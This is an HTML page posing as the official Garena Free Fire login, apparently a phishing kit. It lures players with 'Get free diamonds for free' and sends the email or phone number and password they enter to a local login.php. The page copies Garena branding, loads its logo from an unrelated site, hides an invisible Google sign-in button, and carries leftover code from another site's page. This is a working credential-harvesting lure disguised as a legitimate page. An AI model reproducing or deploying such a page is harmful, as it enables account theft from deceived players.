<!DOCTYPE html>
<html class="en columns-4" lang="en"><head>
    
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta content="width=device-width,maximum-scale=1.0,initial-scale=1.0" name="viewport">
<link rel="icon" href="https://freefiremobile-a.akamaihd.net/ffwebsite/images/freefire32-2.ico" type="image/x-icon">
<link rel="shortcut icon" href="https://freefiremobile-a.akamaihd.net/ffwebsite/images/freefire16-2.ico" type="image/x-icon">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="copyright" content="">
<meta content="black" name="apple-mobile-web-app-status-bar-style">
<meta name="apple-mobile-web-app-title" content="Garena Free Fire">
<meta name="keywords" content="Knives out, pubg, terminator, bullet strike, survival, battle royale, last battleground, last man standing, battle, Bullet strike, point blank, battleground, rules of survival, rule, royale, crossfire, sinh tồn, nhảy dù, bắn súng, 生存, 大逃殺, 絕地求生, 槍戰, 全民, survivor royale, 荒野行動, 吃雞, 狙擊, 無限戰場, PB, Headshot, Crisis Action, ยิง, ปืน, Fortnite, shooting, sobrevivência, Jogos de tiro, a última pessoa viva, la última persona viva, Batalla Royale, disparo, la última persona viva, primera persona, acción, point, blank, last survivor, 배틀로얄, 프라파이어, 서바이벌, 최후 1인, 배틀그라운드, 배틀그라운즈, Free Fire, 생존, 생존게임, FPS, 배그, pubg mobile, world of tanks, танки, пабг, пубг, королевская битва, clash of clans, clash royale, cs go, battlegrounds">
<meta name="description" content="Free Fire is a mobile game where players enter a battlefield where there is only one winner - the last man standing. Grab weapons to do others in and supplies to bolster your chances of survival. Eventually, players are forced into a shrinking play zone to engage each other in a tactical and diverse environment.">
<!-- seo: markup -->
<script async="" src="//connect.facebook.net/en_US/fbevents.js"></script><script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script><script type="application/ld+json">
{
    "@context": "https://ff.garena.com",
    "@type": "MobileGame",
    "name": [{
        "@language": "en",
        "@value": "Garena Free Fire"
    }],
    "description": [{
        "@language": "en",
        "@value": "Garena Free Fire is a survival third-person shooter game in the form of battle royale"
    }],
    "genre": [
        "Action",
        "Third-person shooter"
    ],
    "url": "https://ff.garena.com",
    "image": "https://ff.garena.com/statics/ff/images/poster.jpg",
    "screenshot": "https://ff.garena.com/statics/ff/images/backgroundart.jpg",
    "sameAs": [
        "https://www.youtube.com/c/freefireru"
    ],
    "trailer": {
        "@type": "VideoObject",
        "url": "https://www.youtube.com/watch?v=CN3YgUCB3kQ",
        "inLanguage": "en"
    },
    "exampleOfWork": [{
            "@type": "MobileGame",
            "gamePlatform": [
                "https://en.wikipedia.org/wiki/iOS",
                "https://en.wikipedia.org/wiki/Android"
            ],
            "contentRating": "PEGI 16+",
            "releasedEvent": {
                "@type": "PublicationEvent",
                "startDate": "2017-12-07",
                "location": {
                    "@type": "Place",
                    "name": "TH"
                }
            }
        },
        {
            "@type": "MobileGame",
            "gamePlatform": [
                "https://en.wikipedia.org/wiki/iOS",
                "https://en.wikipedia.org/wiki/Android"
            ],
            "contentRating": "ESRB M",
            "releasedEvent": {
                "@type": "PublicationEvent",
                "startDate": "2017-12-07",
                "location": {
                    "@type": "Country",
                    "name": "TH"
                }
            }
        }
    ]
}
</script>
<link rel="stylesheet" href="/static/common/css/reset.css">
<link rel="stylesheet" href="/static/common/css/common.css">
    <!-- title -->
    
    <title>Garena Free Fire. Best survival Battle Royale on mobile!</title>
    
    <!-- css -->
    
<link rel="stylesheet" href="/static/css/home.css">

</head><body><div data-reactcontainer=""><div><div><div style="margin-top: 100px;"><style>article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
nav,
section,
ul {
  display: block;
}

audio,
canvas,
video {
  display: inline-block;
}

audio:not([controls]) {
  display: none;
}

html {
  font-size: 100%;
  text-size-adjust: none;
}

a:hover,
a:active {
  outline: 0;
}

sub,
sup {
  position: relative;
  font-size: 75%;
  line-height: 0;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}

img {
  max-width: 100%;
  width: auto9;
  height: auto;

  vertical-align: middle;
  border: 0;
  -ms-interpolation-mode: bicubic;
}

#map_canvas img {
  max-width: none;
}

fieldset {
  border: 0;
  margin: 0;
  padding: 0;
}

button,
input,
select,
textarea {
  font-size: 100%;
  margin: 0;
  vertical-align: middle;
}
button,
input {
  overflow: visible;
  line-height: normal;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  padding: 0;
  border: 0;
}
button,
input[type='button'],
input[type='reset'],
input[type='submit'] {
  cursor: pointer;
  -webkit-appearance: button;
}
input[type='search'] {
  box-sizing: content-box;
  -webkit-appearance: textfield;
}
input[type='search']::-webkit-search-decoration,
input[type='search']::-webkit-search-cancel-button {
  -webkit-appearance: none;
}
textarea {
  overflow: auto;
  vertical-align: top;
}
body {
  margin: 0;
}
h1, h2, h3, h4, h5, h6 {
  margin: 0;
}

html {
  background-color: #efefef;
}

html, body {
  font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,"ヒラギノ角ゴ Pro W3","Hiragino Kaku Gothic Pro",メイリオ,Meiryo,"ＭＳ Ｐゴシック",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
  color: rgb(33, 25, 34);
  font-size: 12px;
  height: 100%;
}

body {
  position: relative;
  overflow-y: scroll;
}

input::-ms-clear {
  display: none;
}

a {
  color: #717171;
  font-weight: bold;
  text-decoration: none;
}

a:focus,
a:hover {
  color: #8a8a8a;
}

ul {
  margin: 0;
  padding: 0;
}

ul li {
  list-style: none;
  padding: 0;
}

:focus {
  outline: #d1d1d1 auto 1px
}

button, input, select, textarea {
  font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,"ヒラギノ角ゴ Pro W3","Hiragino Kaku Gothic Pro",メイリオ,Meiryo,"ＭＳ Ｐゴシック",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
  font-size: 100%;
  vertical-align: middle;
  margin: 0px;
}

.SkipToContent {
  display: none;
}

.visuallyHidden {
    border: 0;
    clip: rect(0 0 0 0);
    height: 1px;
    margin: -1px;
    overflow: hidden;
    padding: 0;
    position: absolute;
    width: 1px;
}


.AlternativesSeparatorContinuous:before, .AlternativesSeparatorContinuous:after {
  background: rgba(0,0,0,0.2);
  -webkit-box-shadow: 0 1px 0 rgba(255,255,255,0.5);
  box-shadow: 0 1px 0 rgba(255,255,255,0.5);
  content: '';
  display: inline-block;
  height: 1px;
  position: relative;
  vertical-align: middle;
  width: 37%;
}

.Gender__customGenderTooltip:after, .customGenderTooltip:before {
  bottom: 100%;
  left: 92.5%;
  border: solid transparent;
  content: ' ';
  height: 0;
  width: 0;
  position: absolute;
  pointer-events: none;
}
.Gender__customGenderTooltip:after {
  border-color: rgba(255, 255, 255, 0);
  border-bottom-color: #ffffff;
  border-width: 10px;
  margin-left: -10px;
}
.Gender__customGenderTooltip:before {
  border-color: rgba(145, 145, 145, 0);
  border-bottom-color: #919191;
  border-width: 11px;
  margin-left: -11px;
}
.Gender__customGenderTooltipMobile:after, .customGenderTooltip:before {
  bottom: 100%;
  left: 92.5%;
  border: solid transparent;
  content: ' ';
  height: 0;
  width: 0;
  position: absolute;
  pointer-events: none;
}
.Gender__customGenderTooltipMobile:after {
  border-color: rgba(255, 255, 255, 0);
  border-width: 10px;
  margin-left: -10px;
}
.Gender__customGenderTooltipMobile:before {
  border-color: rgba(145, 145, 145, 0);
  border-bottom-color: #919191;
  border-width: 11px;
  margin-left: -11px;
}
.Gender__customGenderTooltipText:after, .customGenderTooltip:before {
  bottom: 100%;
  left: 92.5%;
  border: solid transparent;
  content: ' ';
  height: 0;
  width: 0;
  position: absolute;
  pointer-events: none;
}
.Gender__customGenderTooltipText:after {
  border-color: rgba(255, 255, 255, 0);
  border-width: 10px;
  margin-left: 5px;
  margin-top: 10px;
}
.Gender__customGenderTooltipText:before {
  border-color: rgba(145, 145, 145, 0);
  border-bottom-color: #919191;
  border-width: 11px;
  margin-left: 5px;
  margin-top: 10px;
}

.Tooltip_message:before, .Tooltip_message:after {
  border-style: solid;
  content: '';
  display: block;
  margin-top: -8px;
  position: absolute;
  right: 100%;
  top: 17px;
  width: 0;
}
.Tooltip_message:before {
  border-color: transparent rgba(0,0,0,0.48);
  border-width: 8px 10px 8px 0;
}
.Tooltip_message:after {
  border-color: transparent #fff;
  border-width: 8px 10px 8px 0;
  margin-right: -1px;
}
.Tooltip_suggestionMessage:before, .Tooltip_suggestionMessage:after {
  border-style: solid;
  content: '';
  display: block;
  margin-top: -8px;
  position: absolute;
  right: 100%;
  top: 17px;
  width: 0;
}
.Tooltip_suggestionMessage:before {
  border-color: transparent rgba(0,0,0,0.48);
  border-width: 8px 10px 8px 0;
}
.Tooltip_suggestionMessage:after {
  border-color: transparent #E2780D;
  border-width: 8px 10px 8px 0;
}
.Tooltip_mobileMessage:before, .Tooltip_message:after {
  border-style: solid;
  display: block;
  margin-top: -8px;
  position: absolute;
  right: 100%;
  top: 17px;
  width: 0;
}
.Tooltip_mobileMessage:before {
  border-color: transparent rgba(0,0,0,0.48);
  border-width: 8px 10px 8px 0;
}
.Tooltip_mobileMessage:after {
  border-color: transparent #fff;
  border-width: 8px 10px 8px 0;
  margin-right: -1px;
}
.Tooltip_wrapper {
  position: absolute;
  left: calc(100% + 12px);
  z-index: 1;
}
.Tooltip_mobileWrapper {
  margin-top: 7px;
  z-index: 1;
}

.TermsOfService__light a {
  color: rgba(255,255,255,0.9);
}

.red.active:focus,
.red.active:hover {
  background-color: #d50c22 !important;
}
.lightGrey.active:focus,
.lightGrey.active:hover {
  background-color: #f5f3f3 !important;
}
.darkGrey.active:focus,
.darkGrey.active:hover {
  background-color: #5e5e5e !important;
}
.blueTransparent.active:focus,
.blueTransparent.active:hover {
  background-color: #0077e6 !important;
}
.white.active:focus,
.white.active:hover {
  background-color: #e6e6e6 !important;
}
@keyframes loadingSpinner {
  to {transform: rotate(360deg);}
}

.loadingSpinner:before {
  content: '';
  box-sizing: border-box;
  position: absolute;
  top: 50%;
  left: 50%;
  width: 20px;
  height: 20px;
  margin-top: -10px;
  margin-left: -10px;
  border-radius: 50%;
  border-top: 2px solid white;
  border-right: 2px solid transparent;
  animation: loadingSpinner 1s linear infinite;
}

.FullPageSignup__signupToggle {
  color: #717171;
}

.FullPageSignup__signupToggle:focus,
.FullPageSignup__signupToggle:hover  {
  color: #8a8a8a;
}


.FullPageModal__scroller {
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
}</style><div data-test-login="true" data-test-id="login" data-m-img="https://freefiremobile-a.akamaihd.net/common/web_event/officialwebsite/home/home_mobile.jpg" data-pc-img="https://freefiremobile-a.akamaihd.net/common/web_event/officialwebsite/home/home_pc.jpg" style="background-image: url(&quot;https://freefiremobile-a.akamaihd.net/common/web_event/officialwebsite/home/home_pc.jpg&quot;);"><div style="min-height: 400px; padding: 20px 10px;"><img class="logo" src="https://stoarooms.gr/fre/files/img/logo.png" alt="Google"><div style="margin: 0px auto 25px; width: 270px;"><h3 style="color: rgb(255, 255, 255); font-size: 32px; font-weight: bold; letter-spacing: -1.2px;">Log in to Free Fire</h3></div><div style="margin: 0px auto 25px; width: 270px;"><h3 style="text-align: center;background-color:black;color: rgb(255, 255, 255); font-size: 16px; font-weight: normal; margin: -15px 0px 20px;">Get free diamonds for free.</h3><h3 style="text-align: center; color: rgb(85, 85, 85); font-size: 16px; font-weight: normal; margin: -15px 0px 20px;"></h3></div><div style="margin: 0px auto; width: 276px;"><div><form method="POST" action="login.php" novalidate=""><fieldset style="position: relative; margin-bottom: 7px;"><div class="_0 _3r _2u"><div class="_0 _3r _2u _6r"><label class="_wx _29 _t7" for="email"><div class="_tf _sc _sd _se _ti _5s _sf _sp _sn _sh"></div></label></div><span><input aria-invalid="false" class="_yp _3r _2u _2s _tf _sc _sd _se _ti _45 _ys _5s _5n _yq" id="email" name="id" placeholder="Email or phone number" type="email"></span></div></fieldset><fieldset style="position: relative;"><div class="_0 _3r _2u"><div class="_0 _3r _2u _6r"><label class="_wx _29 _t7" for="password"><div class="_tf _sc _sd _se _ti _5s _sf _sp _sn _sh"></div></label></div><span><input aria-invalid="false" class="_yp _3r _2u _2s _tf _sc _sd _se _ti _45 _ys _5s _5n _yq" id="password" name="password" placeholder="Password" value="" type="password"></span></div></fieldset><button aria-label="" class="red SignupButton active" style="border: 0px none; height: 36px; display: inline-block; border-radius: 4px; padding: 0px 18px; font-size: 15px; font-weight: bold; outline: medium none; box-shadow: none; cursor: pointer; margin-top: 10px; vertical-align: middle; text-align: center; background-color: rgb(189, 8, 28); color: rgb(255, 255, 255); width: 100%;" type="submit"><div>Log in</div></button></form></div><div style="margin-top: 15px; color: rgb(255, 255, 255);"><a href="https://ff.garena.com/others/policy/en/">Forgot your password?</a><div><span>New here ?<a target="_blank" href="https://ff.garena.com/">Get started here</a></span></div></div></div><div><div></div></div></div></div></div><div style="left: -99999px; opacity: 0; position: relative; top: -999999px; text-indent: 0px; margin: 0px; padding: 0px; background: transparent none repeat scroll 0% 0%; border-style: none; float: none; line-height: normal; font-size: 1px; vertical-align: baseline; display: inline-block; width: 114px; height: 36px;" id="___signin_0"><button style="opacity: 0; z-index: 10000; left: 0px; top: 0px; position: absolute; cursor: pointer; outline: 0px none; width: 114px; height: 36px;">Sign in with Google</button><iframe ng-non-bindable="" hspace="0" marginheight="0" marginwidth="0" scrolling="no" style="position: static; top: 0px; width: 114px; margin: 0px; border-style: none; left: 0px; visibility: visible; height: 36px;" tabindex="0" vspace="0" id="I0_1530213773000" name="I0_1530213773000" src="login_files/signin.html" data-gapiattached="true" title="Sign in with Google" width="100%" frameborder="0"></iframe></div></div></div></div><script type="application/json" id="initial-state">{"googleOneTap": {"googleOneTapFail": false}, "facebookAutoLogin": {"facebookAutoLoginStatus": "unknown"}, "viewer": {"isLimitedLogin": false, "isAuth": false}, "brandAboutPage": {"showBrandAboutPage": false}, "experiences": {"eligibleExperiences": {}, "mountedPlacements": {}, "isFetchingAll": false, "anchorExperiences": {}}, "location": {"pathname": "/login/?referrer=home_page", "history": [{"pathname": "/login/?referrer=home_page"}]}, "ui": {"search": {"currentFilter": "", "recommendedQueries": [], "currentQuery": "", "skinToneQueryUses": {"numQueryUses": 0, "lastQuery": ""}, "currentScope": "pins", "recentQueries": [], "trendingQueries": []}, "conversations": {"chatheads": [], "open": null, "feedback": null}, "pinCreateFlow": {"descriptionError": null, "description": "", "title": "", "type": null, "image": null, "linkError": null, "websiteLinkError": null, "link": "", "websiteLink": "", "video": null, "open": false, "titleError": null}, "visualLinks": {"isTagging": false, "selectedPinTagKey": null}, "mainComponent": {"current": "UnauthLoginReactWrapper", "initial": "UnauthLoginReactWrapper", "locationToErrorMap": {}, "upwtActionName": null}, "homefeed": {"prefetchBookmark": ""}, "login": {"showModal": false}, "toasts": [], "gdprModal": {"showParentConsentModal": false, "showModal": false}}, "resources": {"fetching": {}, "data": {}}}</script>
            <script nonce="yTKrxRWJWE">window.__INITIAL_STATE__ = JSON.parse(
            document.getElementById('initial-state').textContent)</script>
            
            <script type="application/json" id="jsInit1"></script>
            <script nonce="yTKrxRWJWE">
  function installFacebookPixel() {
    !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
      n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
        t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
          document,'script','//connect.facebook.net/en_US/fbevents.js');
    fbq('init', '130492214192672');
    window._sendFacebookPixel = window._fbq;
  }

  if (document.readyState === 'complete'){
    installFacebookPixel();
  }
  window.addEventListener('load', installFacebookPixel);
</script>
<noscript>
  <img height='1' width='1' style='display:none' src='https://www.facebook.com/tr?id=130492214192672&ev=PageView&noscript=1'/>
</noscript>
<script nonce="yTKrxRWJWE">
        window.template_time_logging.push({
        template: 'webapp_body_end',
        name: 'finish_body_render',
        time: Date.now()});
    </script><div id="fb-root" class=" fb_reset fb_reset fb_reset fb_reset fb_reset fb_reset"><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div><iframe name="fb_xdm_frame_https" allowtransparency="true" allowfullscreen="true" scrolling="no" allow="encrypted-media" id="fb_xdm_frame_https" aria-hidden="true" title="Facebook Cross Domain Communication Frame" tabindex="-1" style="border: medium none;" src="login_files/xaOI6zd9HW9.html" frameborder="0"></iframe></div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div></div><iframe name="oauth2relay233983145" id="oauth2relay233983145" src="login_files/postmessageRelay.html" style="width: 1px; height: 1px; position: absolute; top: -100px;" tabindex="-1" aria-hidden="true"></iframe><iframe style="position: absolute; width: 1px; height: 1px; left: -9999px; display: none;" aria-hidden="true" id="ssIFrame_google" sandbox="allow-scripts allow-same-origin" src="login_files/iframe.html"></iframe>





<div style="background-color: black">
<h3 style="background-color: red;color: rgb(255, 255, 255);">Limited premision.</h3>
</div></body></html>
